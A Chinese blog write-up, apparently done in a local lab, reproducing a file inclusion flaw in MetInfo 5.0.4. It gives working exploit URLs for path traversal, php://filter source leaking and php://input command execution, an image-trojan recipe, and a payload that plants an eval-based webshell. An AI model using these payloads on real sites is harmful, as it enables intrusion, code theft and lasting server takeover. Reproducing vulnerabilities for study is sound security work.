【漏洞复现】Metinfo5.0.4任意文件包含漏洞复现

最新推荐文章于 2023-12-27 10:10:27 发布
最新推荐文章于 2023-12-27 10:10:27 发布
阅读量558 收藏 2
点赞数
分类专栏: # 漏洞复现 文章标签: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhaoSong_/article/details/134221624
版权

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录


metinfo_5.0.4为例

该环境的文件上传点在admin路径下

在这里插入图片描述

但是上传文件会失败,

所以直接在网站的upload\file下放入图片木马

文件包含漏洞利用点:/about/index.php?fmodule=7&module=[filePath]

1、蚁剑直接连接图片马

图片马制作:

copy 1.jpg/b+1.php/a 22.jpg

上传图片木马,通过文件包含的方式去访问

http://127.0.0.1/MetInfo5.0.4//about/index.php?fmodule=7&module=../upload/file/22.jpg

在这里插入图片描述

使用蚁剑连接

在这里插入图片描述

在这里插入图片描述

2、读取敏感目录
http://127.0.0.1/MetInfo5.0.4//about/index.php?fmodule=7&module=../../../../../../../../../../../windows/system32/drivers/etc/hosts

在这里插入图片描述

3、读取php源码
http://127.0.0.1/MetInfo5.0.4/about/index.php?fmodule=7&module=php://filter/read=convert.base64-encode/resource=show.php

在这里插入图片描述

读取结果:

PD9waHANCiMgTWV0SW5mbyBFbnRlcnByaXNlIENvbnRlbnQgTWFuYWdlbWVudCBTeXN0ZW0gDQojIENvcHlyaWdodCAoQykgTWV0SW5mbyBDby4sTHRkIChodHRwOi8vd3d3Lm1ldGluZm8uY24pLiBBbGwgcmlnaHRzIHJlc2VydmVkLiANCnJlcXVpcmVfb25jZSAnLi4vaW5jbHVkZS9jb21tb24uaW5jLnBocCc7DQppZighJGlkICYmICRjbGFzczEpJGlkID0gJGNsYXNzMTsNCiRzaG93ID0gJGRiLT5nZXRfb25lKCJTRUxFQ1QgKiBGUk9NICRtZXRfY29sdW1uIFdIRVJFIGlkPSRpZCBhbmQgbW9kdWxlPTEiKTsNCmlmKCEkc2hvd3x8ISRzaG93Wydpc3Nob3cnXSl7DQpva2luZm8oJy4uLzQwNC5odG1sJyk7DQp9DQokbWV0YWNjZXNzPSRzaG93W2FjY2Vzc107DQppZigkc2hvd1tjbGFzc3R5cGVdPT0zKXsNCiRzaG93MyA9ICRkYi0+Z2V0X29uZSgiU0VMRUNUICogRlJPTSAkbWV0X2NvbHVtbiBXSEVSRSBpZD0nJHNob3dbYmlnY2xhc3NdJyIpOw0KJGNsYXNzMT0kc2hvdzNbYmlnY2xhc3NdOw0KJGNsYXNzMj0kc2hvd1tiaWdjbGFzc107DQokY2xhc3MzPSRzaG93W2lkXTsNCn1lbHNlew0KJGNsYXNzMT0kc2hvd1tiaWdjbGFzc10/JHNob3dbYmlnY2xhc3NdOiRpZDsNCiRjbGFzczI9JHNob3dbYmlnY2xhc3NdPyRpZDoiMCI7DQokY2xhc3MzPTA7DQp9DQoNCnJlcXVpcmVfb25jZSAnLi4vaW5jbHVkZS9oZWFkLnBocCc7DQokY2xhc3MxX2luZm89JGNsYXNzX2xpc3RbJGNsYXNzMV07DQokY2xhc3MxX2xpc3Q9JGNsYXNzMV9pbmZvOw0KJGNsYXNzMl9pbmZvPSRjbGFzc19saXN0WyRjbGFzczJdOw0KJGNsYXNzM19pbmZvPSRjbGFzc19saXN0WyRjbGFzczNdOw0KJHNob3dbY29udGVudF09Y29udGVudHNob3coJzxkaXY+Jy4kc2hvd1tjb250ZW50XS4nPC9kaXY+Jyk7DQokc2hvd1tkZXNjcmlwdGlvbl09JHNob3dbZGVzY3JpcHRpb25dPyRzaG93W2Rlc2NyaXB0aW9uXTokbWV0X2tleXdvcmRzOw0KJHNob3dba2V5d29yZHNdPSRzaG93W2tleXdvcmRzXT8kc2hvd1trZXl3b3Jkc106JG1ldF9rZXl3b3JkczsNCiRtZXRfdGl0bGU9JG1ldF90aXRsZT8kc2hvd1snbmFtZSddLictJy4kbWV0X3RpdGxlOiRzaG93WyduYW1lJ107DQppZigkc2hvd1snY3RpdGxlJ10hPScnKSRtZXRfdGl0bGU9JHNob3dbJ2N0aXRsZSddOw0KcmVxdWlyZV9vbmNlICcuLi9wdWJsaWMvcGhwL21ldGh0bWwuaW5jLnBocCc7DQppbmNsdWRlIHRlbXBsYXRlKCdzaG93Jyk7DQpmb290ZXIoKTsNCiMgVGhpcyBwcm9ncmFtIGlzIGFuIG9wZW4gc291cmNlIHN5c3RlbSwgY29tbWVyY2lhbCB1c2UsIHBsZWFzZSBjb25zY2lvdXNseSB0byBwdXJjaGFzZSBjb21tZXJjaWFsIGxpY2Vuc2UuDQojIENvcHlyaWdodCAoQykgTWV0SW5mbyBDby4sIEx0ZC4gKGh0dHA6Ly93d3cubWV0aW5mby5jbikuIEFsbCByaWdodHMgcmVzZXJ2ZWQuDQo/

得出base64编码格式的数据,使用bp的Decoder功能进行base64解码

在这里插入图片描述

也可以利用HackBar浏览器插件

在这里插入图片描述

复制得到的base64编码格式的php代码

在这里插入图片描述

点击 OK

在这里插入图片描述

解码成功!

4、执行PHP命令

bp拦截得到php源码的数据包

在这里插入图片描述

发送到Repeater模块

GET包该成POST数据包

在这里插入图片描述

得到POST数据包

在这里插入图片描述

把POST请求体中的变量放到url中提交

虽然说是POST数据包,但是POST数据包的url中也可以用GET参数

在这里插入图片描述

fmodule=7&module=的值改成php://input,然后在下面写入php代码,点击send

<?php phpinfo();?>

在这里插入图片描述

执行系统代码

<?php 
system("whoami")
?>

在这里插入图片描述

<?php 
system("ipconfig")
?>

在这里插入图片描述

5、包含木马写Shell (图片马制作新方法)
<?php fputs(fopen("shell.php",'w'),'<?=@eval($_REQUEST[777]);phpinfo();?>')?>

该段代码的含义是,在当前目录下创建一个名为shell.php的文件,内容为<?php phpinfo();?>,当我们直接包含图片的时候,这段代码就会被执行

重新再upload\file下放入一张没有木马的图片,使用另一种方式制作图片木马

点击图片---右键属性---详细信息

在这里插入图片描述

点击应用,点击确定

在浏览器中访问图片http://127.0.0.1/MetInfo5.0.4/upload/file/1.jpg,图片正常显示

在这里插入图片描述

使用文件包含的方式去访问图片

http://127.0.0.1/MetInfo5.0.4/about/index.php?fmodule=7&module=../upload/file/1.jpg

页面显示如下:

在这里插入图片描述

随即发现在upload文件夹中有个新建文件shell.php,即可用蚁剑连接

在这里插入图片描述

拿到webshell
在这里插入图片描述

过期的秋刀鱼-
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MetInfo7.5.0代码审计(后台SQL注入+md5弱类型比较)1
08-03
MetInfo7.5.0代码审计(后台SQL注入+md5弱类型比较)1
metinfo 5.0.4 文件上传漏洞复现
agrilly的博客
07-24 450
metinfo 、文件上传、漏洞、一句话木
Webshell全套
09-29
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
CTF 总结01:文件上传绕过
weixin_42789937的博客
12-11 5762
文件上传的番外,一句话木绕过思路,第二版整理,还是会根据做题经验增补的~
Burpsuite配合制作并连接图片
多喝i热水的博客
01-28 9048
目录 制作图片 利用文件包含漏洞 使用连接 制作图片 利用文件包含漏洞 创建PHP文件包含解析图片里的php脚本。upload-labs本身应该会包含一个include.php,模拟页面存在文件包含漏洞 使用连接 ...
文件包含metinfo 5.0.4 文件包含漏洞复现
wj33333的博客
11-15 356
MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 5.0.4版本中的/metinfo_5.0.4/about/index.php?fmodule文件存在任意文件包含漏洞。攻击者可利用漏洞读取网站上的敏感文件。
CTFHub技能树 Web-文件上传 详解
weixin_45808483的博客
11-15 2643
无验证 启动环境 我们上传一句话木 <?php @eval($_POST['shell']);?> 提示了相对路径, 我们直接使用连接。 找到flag。 前端验证 上传php文件,前端校验不允许上传php文件 审计代码,只允许上传图片类型 我们先将后缀改为 .jpg 上传成功 再通过burp抓包,修改filename="1.php"和Content-Type: php 发送数据包,页面显示上传成功 使用连接 成...
metinfo 后台sql注入1
08-03
本文将深入探讨MetInfo 6.1.0版本中的一个SQL注入漏洞,该漏洞存在于app/system/feedback/admin/feedback_admin.class.php文件的第620行。 SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码,欺骗...
MetInfo 企业建站系统 v5.3.16
12-01
9. **附加功能**:如“news”文件可能包含新闻或更新信息,帮助企业了解系统的新特性、更新内容以及相关新闻动态。 总的来说,MetInfo 企业建站系统 v5.3.16 是一款适合中小企业的高效建站工具,它简化了网站搭建...
MetInfo短信插件_MetInfo短信接口开发_MetInfo短信发送设置
01-07
MetInfo_V7.2.0版本可能已经包含了对短信功能的优化和支持,用户在使用过程中,可以充分利用这些功能,提升网站的服务质量和用户体验。总的来说,理解和掌握MetInfo短信插件、接口开发以及发送设置,对于构建一个...
MetInfo模板文件结构与概况详解
08-04
本教程主要对MetInfo系统中的模板文件结构与概况进行了详细的介绍与说明。
中国可以连接图片一句话木吗?
qq_45955869的博客
05-31 1803
连接不上图片一句话木
使用向网站上传小
qq_67757718的博客
02-03 870
准备,被攻击的网站由PHP语言编写,创建一个php文件,编辑脚本<? php @eval($_POST['123'])?> sqlmap -u"http://43.138.211.45/about.php?listid=6" --os-shell进行攻击 选择语言,攻击的网站是由PHP语言编写,输入4,回车,输入y 输入2选择自定义位置,回车,输入根目录位置 查看网站的根目录是/var/www/html 回车得到 两个网址 复制第一个网址,在浏览器中打开
PHP 图片木隐写方法及靶机演示
百彦子烨的博客
11-11 3500
通常在木的实际运用中,我们会面临防御者对文件类型、大小的过滤。有些规定只能上传图片的还可能对图片进行采集,即使攻击者直接更改文件类型也会被拦截。所以我们需要运用隐写技术将木隐藏到图片中,以此来绕过防御,进行上传。
dvwa问题篇 -- 菜刀连接不上图片木 -- 小黑解决教程
最新发布
G_WEB_Xie的博客
12-27 897
各位小伙伴初次玩dvwa会出现各种问题,本来想把一些问题直接总结写一篇dvwa文章来着,但因为都是关键字搜索,所以将一些问题都拆分出来,以便大家方便查类似问题。(大家有遇到不一样的问题欢迎投稿!1、需要在菜刀上访问dvwa,设定为low级别,访问该图片。2、phpstudy的php版本过高将为5.0版本即可。菜刀连接不上图片木
安装使用教程(附:上传漏洞示例)
热门推荐
li963820454的博客
04-06 2万+
简单安装使用教程(附带示例)
Web安全--文件上传漏洞
bobo_milk的博客
11-11 1101
本文参考了一些文章,如有侵权请留言删除。该文章基于upload-labs基础靶场进行编写。
漏洞复现】Microsoft Office MSDT 远程代码执行漏洞 (CVE-2022-30190)
qq_17754023的博客
06-03 4746
0x01 Microsoft OfficeMicrosoft Office是由Microsoft(微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint等。0x02 漏洞简介该文档使用 Word 远程模板功能从远程网络服务器检索 HTML 文件,该服务器使用 ms-msdt MSProtocol URI 方案加载代码并执行 PowerShell,禁用宏,仍能通过MSDT功能执行代码(恶意 Word 文档通常用于通过宏执行代码)。......
upload-labs 1-3关
m0_56135391的博客
04-17 2825
Pass-01 直接上传含有一句话木的php文件,显示文件上传格式不被允许 查看网页源码,将check File的函数删除 再次上传该php文件,上传成功 复制图片链接,使用进行连接连接成功 Pass-02 查看源码,发现后端php代码只对concent-type进行检查 使用burpsuite进行抓包 将content-type改为image/jpeg 放包,文件成功上传 在中输入该文件路径,成功连接 Pass-03 上传php文件,显示不允许上传 将文件后缀名
metinfo6.0.0文件上传
09-01
根据引用中提到的目录,在南方数据管理系统中存在文件上传漏洞。具体来说,在南方数据管理系统的旧版本中,可以利用数据库备份功能来上传恶意文件,从而获得webshell权限。而根据引用中的步骤,可以通过上传大、绕过上传限制、利用数据库备份功能将文件另存并重命名,最后通过访问shell.asp文件来执行恶意操作。所以,metinfo文件上传漏洞可以通过南方数据管理系统的数据库备份功能来利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值